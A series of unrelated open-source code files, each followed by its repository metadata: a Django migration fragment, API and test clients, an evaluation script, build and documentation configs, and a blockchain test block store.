'tag': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'market.marketpostcomment': {
'Meta': {'object_name': 'MarketPostComment'},
'comment': ('django.db.models.fields.TextField', [], {}),
'commented_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketBlogPost']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'market.marketpostpick': {
'Meta': {'object_name': 'MarketPostPick'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketBlogPost']"})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('core.thumbs.ImageWithThumbsField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'market.privacypolicy': {
'Meta': {'object_name': 'PrivacyPolicy'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'text': ('django.db.models.fields.TextField', [], {'default': "''"})
},
'market.termsandconditions': {
'Meta': {'object_name': 'TermsAndConditions'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'text': ('django.db.models.fields.TextField', [], {'default': "''"})
}
}
complete_apps = ['market']
| {
"content_hash": "7da66e7c43b8acb4bc461c88b535c4d2",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 181,
"avg_line_length": 74.01875,
"alnum_prop": 0.552478257198345,
"repo_name": "codepython/CollectorCity-Market-Place",
"id": "7ac549736b06cad6e1e616a616859396016891d6",
"size": "11861",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "marketplaces/apps/market/migrations/0017_auto__chg_field_marketplacesettings_twitter_maxlength.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "863646"
},
{
"name": "HTML",
"bytes": "475154"
},
{
"name": "JavaScript",
"bytes": "693720"
},
{
"name": "Python",
"bytes": "1860719"
},
{
"name": "Shell",
"bytes": "1174"
}
],
"symlink_target": ""
} |
import untappd
Class Venue(object):
def __init__(self, ): | {
"content_hash": "4c5abc307f8aea102dd409e36efef7f0",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 23,
"avg_line_length": 10.333333333333334,
"alnum_prop": 0.6451612903225806,
"repo_name": "adamomfg/pytappd",
"id": "2aba6afd94fb80de5415c4147e5b80be7c8ca8d9",
"size": "62",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "untappd/venue.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8177"
}
],
"symlink_target": ""
} |
import json
from tempest.common.rest_client import RestClient
class HypervisorClientJSON(RestClient):
def __init__(self, config, username, password, auth_url, tenant_name=None):
super(HypervisorClientJSON, self).__init__(config, username,
password, auth_url,
tenant_name)
self.service = self.config.compute.catalog_type
def get_hypervisor_list(self):
"""List hypervisors information."""
resp, body = self.get('os-hypervisors')
body = json.loads(body)
return resp, body['hypervisors']
def get_hypervisor_list_details(self):
"""Show detailed hypervisors information."""
resp, body = self.get('os-hypervisors/detail')
body = json.loads(body)
return resp, body['hypervisors']
def get_hypervisor_show_details(self, hyper_id):
"""Display the details of the specified hypervisor."""
resp, body = self.get('os-hypervisors/%s' % hyper_id)
body = json.loads(body)
return resp, body['hypervisor']
def get_hypervisor_servers(self, hyper_name):
"""List instances belonging to the specified hypervisor."""
resp, body = self.get('os-hypervisors/%s/servers' % hyper_name)
body = json.loads(body)
return resp, body['hypervisors']
def get_hypervisor_stats(self):
"""Get hypervisor statistics over all compute nodes."""
resp, body = self.get('os-hypervisors/statistics')
body = json.loads(body)
return resp, body['hypervisor_statistics']
def get_hypervisor_uptime(self, hyper_id):
"""Display the uptime of the specified hypervisor."""
resp, body = self.get('os-hypervisors/%s/uptime' % hyper_id)
body = json.loads(body)
return resp, body['hypervisor']
def search_hypervisor(self, hyper_name):
"""Search specified hypervisor."""
resp, body = self.get('os-hypervisors/%s/search' % hyper_name)
body = json.loads(body)
return resp, body['hypervisors']
| {
"content_hash": "81091d18df572cdda7910c9748054629",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 79,
"avg_line_length": 39.148148148148145,
"alnum_prop": 0.6121097445600757,
"repo_name": "BeenzSyed/tempest",
"id": "c8ac9518a1d9f02bde959ddc340b11c05379a9b3",
"size": "2746",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tempest/services/compute/json/hypervisor_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2613370"
},
{
"name": "Shell",
"bytes": "8687"
}
],
"symlink_target": ""
} |
def Enum(**enums): return type('Enum', (), enums)
class Stack(list):
# all Ostrich types; also used for state management
TYPES = Enum(NUMBER=0, STRING=1, BLOCK=2, ARRAY=3)
# extra states (used for :, etc.)
XSTATE = Enum(ASSIGN='_XASGN', EXIT='_XEXIT', CHAR='_XCHAR',
CHARBLOCK = '_XCHBK')
def typeof(x):
xt = type(x)
if xt is list:
return OST.ARRAY
if xt is block:
return OST.BLOCK
if xt is str:
return OST.STRING
if xt is int or xt is float:
return OST.NUMBER
def convert(x, to_type):
from_type = OS.typeof(x)
if to_type == OST.ARRAY:
if from_type == OST.ARRAY:
return x
return [x]
if to_type == OST.BLOCK:
return block(OS.tostr(x))
if to_type == OST.STRING:
if from_type == OST.ARRAY:
return ' '.join(map(lambda item: OS.convert(item, to_type), x))
if from_type in [OST.NUMBER, OST.STRING, OST.BLOCK]:
return str(x)
if to_type == OST.NUMBER:
return int(OS.tostr(x))
# for convenience
def tostr(x):
return OS.convert(x, OST.STRING)
def inspect(x):
xt = OS.typeof(x)
if xt == OST.ARRAY:
return '[%s]' % ' '.join(map(OS.inspect, x))
if xt == OST.BLOCK:
return '{%s}' % x
if xt == OST.STRING:
return '`%s`' % x
if xt == OST.NUMBER:
return ('%d' if type(x) is int else '%f') % x
# pop n elements
def popn(self, n):
xs = self[-n:]
del self[-n:]
return xs
# pop by precedence: take last n elements, order as specified in TYPES
def pprec(self, n):
return OS.byprec(self.popn(n))
# this one just sorts by precedence
def byprec(xs):
return sorted(xs, key=lambda x: OS.typeof(x), reverse=True)
# used for REPL
def clear(self):
del self[:]
# to differentiate blocks and strings
class Block(str): pass
# just for convenience
OS = Stack
OST = Stack.TYPES
block = Block
| {
"content_hash": "58f3172eff395c605126064e4cb7fb0e",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 79,
"avg_line_length": 27.075949367088608,
"alnum_prop": 0.5278167367928939,
"repo_name": "KeyboardFire/ostrich-lang",
"id": "4c2af14f2414d7ee098ad590b55371954a7b6378",
"size": "2157",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/ost_stack.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38576"
}
],
"symlink_target": ""
} |
import numpy as np
import math
import argparse
import subprocess
import tempfile
from scipy.spatial.distance import *
import os
BASEDIR = os.path.dirname(os.path.abspath(__file__))
EXACTMATCH_DATASET = os.path.join(BASEDIR, 'ExactMatchChairsDataset')
RESULTDIR = os.path.join(BASEDIR,'results')
parser = argparse.ArgumentParser(description="shape2image and image2shape evaluation on exact-match-chair dataset.")
parser.add_argument('-m', '--img_model_ids_file', help='File, each line is model id (0to6776) of img.', required=True)
parser.add_argument('-i', '--input_npy_file', help='Input numpy file (pool5 feature), contains an array of N*C*H*W', required=True)
parser.add_argument('-s', '--shape_embedding_file', help='Shape embedding txt file (#model * #embedding-dim).', required=False)
parser.add_argument('-d', '--model_deploy_file', help='Caffe model deploy file (batch size = 50).', required=False)
parser.add_argument('-p', '--model_param_file', help='Caffe model parameter file.', required=False)
parser.add_argument('-n1', '--nb_image2shape', help='Number of nearest shapes', required=True)
parser.add_argument('-n2', '--nb_shape2image', help='Number of nearest images', required=True)
parser.add_argument('--result_id', help='Result ID (string)', required=True)
parser.add_argument('--distance_matrix_txt_file', help='Distance matrix (#image * #model) txt file (default=None)', default=None, required=False)
parser.add_argument('--clutter_only', help='Test on clutter image only.', action='store_true')
parser.add_argument('--clean_only', help='Test on clean image only.', action='store_true')
parser.add_argument('--feat_dim', help='Embedding feat dim (default=100)', default=100, required=False)
args = parser.parse_args()
# 315 test image names
img_names = [x.rstrip() for x in open(os.path.join(EXACTMATCH_DATASET, 'exact_match_chairs_img_filelist.txt'),'r')]
# 105 modelIds of exact match dataset
exact_match_modelIds = [int(x.rstrip()) for x in open(os.path.join(EXACTMATCH_DATASET, 'exact_match_chairs_shape_modelIds_0to6776.txt'),'r')]
# 141 cluttered image index (in 315 test images)
exact_match_cluttered_indicies = [int(x.rstrip()) for x in open(os.path.join(EXACTMATCH_DATASET, 'exact_match_chairs_cluttered_img_indicies_0to314.txt'),'r')]
exact_match_clean_indicies = [x for x in range(315) if x not in exact_match_cluttered_indicies]
# 315 image model ids
image_model_ids = np.loadtxt(args.img_model_ids_file)
if args.clutter_only:
image_model_ids = image_model_ids[exact_match_cluttered_indicies]
img_names = [img_names[k] for k in exact_match_cluttered_indicies]
elif args.clean_only:
image_model_ids = image_model_ids[exact_match_clean_indicies]
img_names = [img_names[k] for k in exact_match_clean_indicies]
print 'image_model_ids:', image_model_ids
image_ids_for_315_models = []
for modelid in exact_match_modelIds:
t = []
for i in range(len(image_model_ids)):
if modelid == image_model_ids[i]:
t.append(i)
image_ids_for_315_models.append(t)
#
# COMPUTE IMAGE-SHAPE DISTANCE MATRIX
#
# configuration params
if args.distance_matrix_txt_file is not None:
D = np.loadtxt(args.distance_matrix_txt_file)
if D.shape[0] > len(image_model_ids):
assert(D.shape[0] == 315)
if args.clutter_only:
D = D[exact_match_cluttered_indicies,:] # 141*6777
elif args.clean_only:
D = D[exact_match_clean_indicies,:]
else:
deploy_file = args.model_deploy_file
shape_embedding_file = args.shape_embedding_file
embedding_model_path = args.model_param_file
# get image embedding from pool5 features
feat_name = os.path.join(RESULTDIR, 'tmp_image_embedding')
cmd = os.path.join(BASEDIR, '/extract_feature_batch_generic.py')
subprocess.call(['python', cmd, '-i', args.input_npy_file, '-d', deploy_file, '-p', embedding_model_path, '-b', str(50), '--feat_dim', str(args.feat_dim), '--feat_name', 'fc8_embedding', '--save_file', feat_name, '--save_file_format', 'npy'])
# compute distances between images and shapes
image_embedding = np.load(feat_name+'.npy')
if args.clutter_only:
image_embedding = image_embedding[exact_match_cluttered_indicies,:]
elif args.clean_only:
image_embedding = image_embedding[exact_match_clean_indicies,:]
image_embedding = image_embedding.reshape((image_embedding.shape[0], image_embedding.shape[1]))
assert(image_model_ids.shape[0] == image_embedding.shape[0])
shape_embedding = np.loadtxt(shape_embedding_file)
print image_embedding.shape, shape_embedding.shape
D = cdist(image_embedding, shape_embedding)
#
# IMAGE2SHAPE
#
dist_name = os.path.join(RESULTDIR, 'tmp_image2shape_dist.txt')
np.savetxt(dist_name, D)
print np.shape(D)
image_N = D.shape[0]
image2shape_retrieval_ranking = []
image2shape_retrieval_ranking_105models = []
for k in range(image_N):
distances = D[k,:]#[float(distance) for distance in line.strip().split()]
ranking = range(len(distances))
ranking.sort(key = lambda rank:distances[rank])
print 'image %d %s \t retrieval: %d' % (k,img_names[k].split('/')[-1], ranking.index(image_model_ids[k])+1)
image2shape_retrieval_ranking.append(ranking.index(image_model_ids[k])+1)
# only consider the 105 models
distances_105models = D[k,exact_match_modelIds]
ranking_105models = range(len(distances_105models))
ranking_105models.sort(key = lambda rank:distances_105models[rank])
image2shape_retrieval_ranking_105models.append(ranking_105models.index(exact_match_modelIds.index(image_model_ids[k]))+1)
image2shape_topK_accuracies = []
image2shape_topK_accuracies_105models = []
for topK in range(250):
n = sum([r <= topK+1 for r in image2shape_retrieval_ranking])
image2shape_topK_accuracies.append(n / float(image_N))
# only consider the 105 models
n = sum([r <= topK+1 for r in image2shape_retrieval_ranking_105models])
image2shape_topK_accuracies_105models.append(n / float(image_N))
np.savetxt(args.result_id+'_image2shape_topK_accuracy.txt', image2shape_topK_accuracies, fmt='%.4f')
np.savetxt(args.result_id+'_image2shape_topK_accuracy_105models.txt', image2shape_topK_accuracies_105models, fmt='%.4f')
#
# SHAPE2IMAGE
#
dist_name = os.path.join(RESULTDIR, 'tmp_shape2image_dist.txt')
np.savetxt(dist_name, D.transpose())
image_model_ids_set = set(image_model_ids)
model_N = min(len(exact_match_modelIds), len(set(image_model_ids)))
first_ranks = []
last_ranks = []
shape2image_retrieval_ranking = []
for k in range(len(exact_match_modelIds)): # 0 - 104
modelId = exact_match_modelIds[k]
if modelId not in image_model_ids_set:
continue
distances = D.transpose()[modelId,:] # clutter: 141*1
ranking = range(len(distances))
ranking.sort(key = lambda rank:distances[rank])
ranks = [ranking.index(j)+1 for j in image_ids_for_315_models[k]]
retrieval_rank = min(ranks) # find images corresponding to this model
print 'model %d %s\t retrieval: %d' % (k,exact_match_modelIds[k], retrieval_rank)
shape2image_retrieval_ranking.append(retrieval_rank)
first_ranks.append(min(ranks))
last_ranks.append(max(ranks))
shape2image_topK_accuracies = []
for topK in range(250):
n = sum([r <= topK+1 for r in shape2image_retrieval_ranking])
shape2image_topK_accuracies.append(n / float(model_N))
print first_ranks
print last_ranks
np.savetxt(args.result_id+'_shape2image_topK_accuracy.txt', shape2image_topK_accuracies, fmt='%.4f')
np.savetxt(args.result_id+'_first_last_appearance_median_rank.txt', [np.median(first_ranks), np.median(last_ranks)], fmt='%d')
| {
"content_hash": "90fe9b641efb744d86c624066aeb6dcd",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 244,
"avg_line_length": 45.04819277108434,
"alnum_prop": 0.7250601765177855,
"repo_name": "ShapeNet/JointEmbedding",
"id": "6db87f19847935354a5a49f6135911b46e547a40",
"size": "7478",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/experiments/shape2image_image2shape_evaluation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "1929"
},
{
"name": "M",
"bytes": "388"
},
{
"name": "Matlab",
"bytes": "33139"
},
{
"name": "Python",
"bytes": "139434"
},
{
"name": "Shell",
"bytes": "17152"
}
],
"symlink_target": ""
} |
import cx_Freeze
import sys
base = None
if sys.platform == 'win32':
base = "Win32GUI"
executables = [cx_Freeze.Executable("weather.py", base=base, icon="sun.ico")]
cx_Freeze.setup(
name="Sunshine",
options={"build_exe": {"packages": ["Tkinter", "PIL"], "include_files": ["keys.py", "sun.ico", "sun.png",
"next.png", "prev.png",
"city.list.json"]}},
version="0.01",
description="Simple weather GUI application",
executables=executables
)
| {
"content_hash": "efa8c6858b4d1c55de974ec5e45245ca",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 109,
"avg_line_length": 32.578947368421055,
"alnum_prop": 0.4862681744749596,
"repo_name": "DevipriyaSarkar/Sunshine",
"id": "5bd13a36b075b17e1a76238e61977140ad53dde4",
"size": "619",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13572"
}
],
"symlink_target": ""
} |
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Dolphin'
copyright = u'2012, Jeremy Self'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Dolphindoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Dolphin.tex', u'Dolphin Documentation',
u'Jeremy Self', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'dolphin', u'Dolphin Documentation',
[u'Jeremy Self'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Dolphin', u'Dolphin Documentation',
u'Jeremy Self', 'Dolphin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| {
"content_hash": "2a325634c2e649b4986b464c8b2eeb6a",
"timestamp": "",
"source": "github",
"line_count": 229,
"max_line_length": 80,
"avg_line_length": 31.91703056768559,
"alnum_prop": 0.7009166780681352,
"repo_name": "coxmediagroup/dolphin",
"id": "5726c60dccd9cc0b27a51d4adcc8c7fa7f4acc0d",
"size": "7727",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/source/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "264"
},
{
"name": "Python",
"bytes": "84795"
},
{
"name": "Shell",
"bytes": "713"
}
],
"symlink_target": ""
} |
import unittest
from docido_sdk.toolbox.edsl import kwargsql
and_ = kwargsql.and_
or_ = kwargsql.or_
xor = kwargsql.xor
class TestKwargSQL(unittest.TestCase):
d = {
's': 's_value',
'i': 3,
'nested': {
'val': 'nested-value',
'another_key': 42,
},
'array': [4, 5, 6],
'exc': Exception("Error: a comprensive message")
}
def test_operations(self):
self.assertFalse(kwargsql.OPERATIONS['ne']('a', u'a'))
self.assertTrue(kwargsql.OPERATIONS['ne']('a', 42))
self.assertFalse(kwargsql.OPERATIONS['lt'](42, 42))
self.assertTrue(kwargsql.OPERATIONS['lt'](41, 42))
self.assertTrue(kwargsql.OPERATIONS['lte'](42, 42))
self.assertFalse(kwargsql.OPERATIONS['gt'](42, 42))
self.assertTrue(kwargsql.OPERATIONS['gt'](42, 41))
self.assertTrue(kwargsql.OPERATIONS['gte'](42, 42))
self.assertTrue(kwargsql.OPERATIONS['in'](1, [2, 3, 1, 4]))
self.assertTrue(kwargsql.OPERATIONS['nin'](0, [1, 2, 3]))
self.assertTrue(kwargsql.OPERATIONS['size']([1, 2, 3], 3))
self.assertTrue(kwargsql.OPERATIONS['iexact']('foo', u'Foo'))
self.assertTrue(kwargsql.OPERATIONS['contains']('abcde', 'bcd'))
self.assertTrue(kwargsql.OPERATIONS['icontains']('abcd', 'bCD'))
self.assertTrue(kwargsql.OPERATIONS['startswith']('abcd', 'abc'))
self.assertTrue(kwargsql.OPERATIONS['istartswith']('abcd', 'aBc'))
self.assertTrue(kwargsql.OPERATIONS['endswith']('abcd', 'bcd'))
self.assertTrue(kwargsql.OPERATIONS['iendswith']('abcd', 'BcD'))
self.assertTrue(kwargsql.OPERATIONS['isinstance']('abcd', basestring))
self.assertTrue(kwargsql.OPERATIONS['issubclass'](str, basestring))
def test_seqexp(self):
d = self.d
self.assertTrue(and_(d, s='s_value', i=3))
self.assertFalse(and_(d, s='s_value', i=1))
self.assertFalse(or_(d, s='not', i='not'))
self.assertTrue(or_(d, s='s_value', i='not'))
self.assertTrue(or_(d, s='not', i=3))
self.assertTrue(or_(d, s='s_value', foo_i=3))
self.assertTrue(xor(d, foo_i=42, s='s_value'))
self.assertFalse(xor(d, foo_i=42, s='unknown'))
def test_simple_op(self):
d = self.d
self.assertTrue(and_(d, nested__size=2))
def test_simple_trailing__(self):
self.assertTrue(and_(self.d, s__='s_value'))
def test_not(self):
d = self.d
self.assertFalse(and_(d, s__not='s_value'))
def test_nested(self):
d = self.d
self.assertTrue(and_(d, nested__val='nested-value'))
self.assertTrue(and_(d, exc__message__istartswith='error: '))
def test_arrays(self):
self.assertTrue(and_(self.d, array__1=5))
def test_invalid(self):
with self.assertRaises(Exception):
and_(self.d, __=42)
def test_exist_operation(self):
self.assertFalse(and_(self.d, nested__unknown__exists=1))
self.assertFalse(and_(self.d, exc__unknown__exists=1))
def test_get(self):
self.assertEqual(kwargsql.get(self.d, 'nested__val'), 'nested-value')
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "d2f801ad8195ff8acae65b5bfb6e8b02",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 78,
"avg_line_length": 36.9080459770115,
"alnum_prop": 0.5951417004048583,
"repo_name": "LilliJane/docido-python-sdk",
"id": "aa66097112aa37ec50222bfa74eca67f04251ba3",
"size": "3211",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_kwargsql.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "225"
},
{
"name": "Python",
"bytes": "152553"
}
],
"symlink_target": ""
} |
import pytest
import unittest
from modules.sfp_dnsgrep import sfp_dnsgrep
from sflib import SpiderFoot
@pytest.mark.usefixtures
class TestModuleDnsGrep(unittest.TestCase):
def test_opts(self):
module = sfp_dnsgrep()
self.assertEqual(len(module.opts), len(module.optdescs))
def test_setup(self):
sf = SpiderFoot(self.default_options)
module = sfp_dnsgrep()
module.setup(sf, dict())
def test_watchedEvents_should_return_list(self):
module = sfp_dnsgrep()
self.assertIsInstance(module.watchedEvents(), list)
def test_producedEvents_should_return_list(self):
module = sfp_dnsgrep()
self.assertIsInstance(module.producedEvents(), list)
| {
"content_hash": "fad0a5fffa61c8737cb53aa56143f3b9",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 64,
"avg_line_length": 27.923076923076923,
"alnum_prop": 0.6914600550964187,
"repo_name": "smicallef/spiderfoot",
"id": "69cfefaa5e03998fe1ae61cd9c6d9ea1c19de861",
"size": "726",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/unit/modules/test_sfp_dnsgrep.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9833"
},
{
"name": "Dockerfile",
"bytes": "2779"
},
{
"name": "JavaScript",
"bytes": "34248"
},
{
"name": "Python",
"bytes": "2845553"
},
{
"name": "RobotFramework",
"bytes": "7584"
},
{
"name": "Shell",
"bytes": "1636"
}
],
"symlink_target": ""
} |
from .mininode import *
from io import BytesIO
import dbm.ndbm
class BlockStore(object):
def __init__(self, datadir):
self.blockDB = dbm.ndbm.open(datadir + "/blocks", 'c')
self.currentBlock = 0
self.headers_map = dict()
def close(self):
self.blockDB.close()
def erase(self, blockhash):
del self.blockDB[repr(blockhash)]
# lookup an entry and return the item as raw bytes
def get(self, blockhash):
value = None
try:
value = self.blockDB[repr(blockhash)]
except KeyError:
return None
return value
# lookup an entry and return it as a CBlock
def get_block(self, blockhash):
ret = None
serialized_block = self.get(blockhash)
if serialized_block is not None:
f = BytesIO(serialized_block)
ret = CBlock()
ret.deserialize(f)
ret.calc_sha256()
return ret
def get_header(self, blockhash):
try:
return self.headers_map[blockhash]
except KeyError:
return None
# Note: this pulls full blocks out of the database just to retrieve
# the headers -- perhaps we could keep a separate data structure
# to avoid this overhead.
def headers_for(self, locator, hash_stop, current_tip=None):
if current_tip is None:
current_tip = self.currentBlock
current_block_header = self.get_header(current_tip)
if current_block_header is None:
return None
response = msg_headers()
headersList = [ current_block_header ]
maxheaders = 2000
while (headersList[0].sha256 not in locator.vHave):
prevBlockHash = headersList[0].hashPrevBlock
prevBlockHeader = self.get_header(prevBlockHash)
if prevBlockHeader is not None:
headersList.insert(0, prevBlockHeader)
else:
break
headersList = headersList[:maxheaders] # truncate if we have too many
hashList = [x.sha256 for x in headersList]
index = len(headersList)
if (hash_stop in hashList):
index = hashList.index(hash_stop)+1
response.headers = headersList[:index]
return response
def add_block(self, block):
block.calc_sha256()
try:
self.blockDB[repr(block.sha256)] = bytes(block.serialize())
except TypeError as e:
print("Unexpected error: ", sys.exc_info()[0], e.args)
self.currentBlock = block.sha256
self.headers_map[block.sha256] = CBlockHeader(block)
def add_header(self, header):
self.headers_map[header.sha256] = header
# lookup the hashes in "inv", and return p2p messages for delivering
# blocks found.
def get_blocks(self, inv):
responses = []
for i in inv:
if (i.type == 2): # MSG_BLOCK
data = self.get(i.hash)
if data is not None:
# Use msg_generic to avoid re-serialization
responses.append(msg_generic(b"block", data))
return responses
def get_locator(self, current_tip=None):
if current_tip is None:
current_tip = self.currentBlock
r = []
counter = 0
step = 1
lastBlock = self.get_block(current_tip)
while lastBlock is not None:
r.append(lastBlock.hashPrevBlock)
for i in range(step):
lastBlock = self.get_block(lastBlock.hashPrevBlock)
if lastBlock is None:
break
counter += 1
if counter > 10:
step *= 2
locator = CBlockLocator()
locator.vHave = r
return locator
class TxStore(object):
def __init__(self, datadir):
self.txDB = dbm.ndbm.open(datadir + "/transactions", 'c')
def close(self):
self.txDB.close()
# lookup an entry and return the item as raw bytes
def get(self, txhash):
value = None
try:
value = self.txDB[repr(txhash)]
except KeyError:
return None
return value
def get_transaction(self, txhash):
ret = None
serialized_tx = self.get(txhash)
if serialized_tx is not None:
